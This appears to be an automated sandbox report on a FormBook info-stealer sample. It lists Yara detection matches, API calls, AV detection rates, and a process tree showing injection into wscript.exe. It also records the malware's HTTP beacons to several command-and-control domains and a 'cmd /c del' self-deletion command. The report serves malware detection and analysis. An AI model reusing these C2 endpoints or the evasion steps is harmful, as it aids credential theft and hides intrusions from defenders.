Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.chinatowndeliver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 23.227.38.74 23.227.38.74

Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: http://statcounter.com/
Source: explorer.exe, 00000005.00000000.391155069.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/bg.png)
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/error_board.png)
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png)
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif)
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png)

Source: unknown

DNS traffic detected: queries for: www.bellaalubo.com

Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1Host: www.bellaalubo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.behiscalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1Host: www.productprinting.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1Host: www.corlora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.jspagnier-graveur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.chinatowndeliver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: UaTmOE6yP9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_008E275D	0_2_008E275D
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01792060	0_2_01792060
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01796080	0_2_01796080
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_017947A0	0_2_017947A0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01796620	0_2_01796620
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01792A48	0_2_01792A48
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01797080	0_2_01797080
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_017954E8	0_2_017954E8
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_017919D0	0_2_017919D0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_017941A8	0_2_017941A8
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01794E00	0_2_01794E00
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_0179B1E8	0_2_0179B1E8
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01793040	0_2_01793040
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_0179B808	0_2_0179B808
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01793BC0	0_2_01793BC0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_00911D21	0_2_00911D21
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_008E6458	0_2_008E6458
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041C970	3_2_0041C970
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B9BF	3_2_0041B9BF
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041D294	3_2_0041D294
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041CBD1	3_2_0041CBD1
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00408C80	3_2_00408C80
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041CC9E	3_2_0041CC9E
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00402D88	3_2_00402D88
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_008E275D	3_2_008E275D
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00911D21	3_2_00911D21
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_008E6458	3_2_008E6458
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05220D20	9_2_05220D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120	9_2_05244120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522F900	9_2_0522F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F2D07	9_2_052F2D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F1D55	9_2_052F1D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581	9_2_05252581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523D5E0	9_2_0523D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1002	9_2_052E1002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523841F	9_2_0523841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0	9_2_052520A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F20A8	9_2_052F20A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B090	9_2_0523B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F2B28	9_2_052F2B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525EBB0	9_2_0525EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F1FF1	9_2_052F1FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05246E30	9_2_05246E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F22AE	9_2_052F22AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F2EF7	9_2_052F2EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB9BF	9_2_00DDB9BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDC970	9_2_00DDC970
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDD294	9_2_00DDD294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDCBD1	9_2_00DDCBD1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDCC9E	9_2_00DDCC9E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DC8C80	9_2_00DC8C80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DC2D90	9_2_00DC2D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DC2D88	9_2_00DC2D88
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DC2FB0	9_2_00DC2FB0

Source: C:\Windows\SysWOW64\wscript.exe

Code function: String function: 0522B150 appears 35 times

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_004185E0 NtCreateFile,	3_2_004185E0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00418690 NtReadFile,	3_2_00418690
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00418710 NtClose,	3_2_00418710
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_004187C0 NtAllocateVirtualMemory,	3_2_004187C0
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_004185DA NtCreateFile,	3_2_004185DA
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041868A NtReadFile,	3_2_0041868A
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041868C NtReadFile,	3_2_0041868C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_05269910
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269540 NtReadFile,LdrInitializeThunk,	9_2_05269540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052699A0 NtCreateSection,LdrInitializeThunk,	9_2_052699A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052695D0 NtClose,LdrInitializeThunk,	9_2_052695D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_05269860
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269840 NtDelayExecution,LdrInitializeThunk,	9_2_05269840
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269710 NtQueryInformationToken,LdrInitializeThunk,	9_2_05269710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269780 NtMapViewOfSection,LdrInitializeThunk,	9_2_05269780
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269FE0 NtCreateMutant,LdrInitializeThunk,	9_2_05269FE0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_05269660
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269650 NtQueryValueKey,LdrInitializeThunk,	9_2_05269650
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A50 NtCreateFile,LdrInitializeThunk,	9_2_05269A50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052696E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_052696E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052696D0 NtCreateKey,LdrInitializeThunk,	9_2_052696D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269520 NtWaitForSingleObject,	9_2_05269520
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526AD30 NtSetContextThread,	9_2_0526AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269560 NtWriteFile,	9_2_05269560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269950 NtQueueApcThread,	9_2_05269950
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052695F0 NtQueryInformationFile,	9_2_052695F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052699D0 NtCreateProcessEx,	9_2_052699D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269820 NtEnumerateKey,	9_2_05269820
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526B040 NtSuspendThread,	9_2_0526B040
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052698A0 NtWriteVirtualMemory,	9_2_052698A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052698F0 NtReadVirtualMemory,	9_2_052698F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269730 NtQueryVirtualMemory,	9_2_05269730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269B00 NtSetValueKey,	9_2_05269B00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526A710 NtOpenProcessToken,	9_2_0526A710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269760 NtOpenProcess,	9_2_05269760
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269770 NtSetInformationFile,	9_2_05269770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526A770 NtOpenThread,	9_2_0526A770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052697A0 NtUnmapViewOfSection,	9_2_052697A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526A3B0 NtGetContextThread,	9_2_0526A3B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A20 NtResumeThread,	9_2_05269A20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A00 NtProtectVirtualMemory,	9_2_05269A00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269610 NtEnumerateValueKey,	9_2_05269610
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A10 NtQuerySection,	9_2_05269A10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269670 NtQueryInformationProcess,	9_2_05269670
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05269A80 NtOpenDirectoryObject,	9_2_05269A80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD85E0 NtCreateFile,	9_2_00DD85E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD8690 NtReadFile,	9_2_00DD8690
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD87C0 NtAllocateVirtualMemory,	9_2_00DD87C0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD8710 NtClose,	9_2_00DD8710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD85DA NtCreateFile,	9_2_00DD85DA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD868C NtReadFile,	9_2_00DD868C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD868A NtReadFile,	9_2_00DD868A

Source: UaTmOE6yP9.exe, 00000003.00000002.412436722.000000000147F000.00000040.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs UaTmOE6yP9.exe

Source: UaTmOE6yP9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: UaTmOE6yP9.exe	Virustotal: Detection: 43%
Source: UaTmOE6yP9.exe	Metadefender: Detection: 37%
Source: UaTmOE6yP9.exe	ReversingLabs: Detection: 77%

Source: UaTmOE6yP9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe 'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@9/5

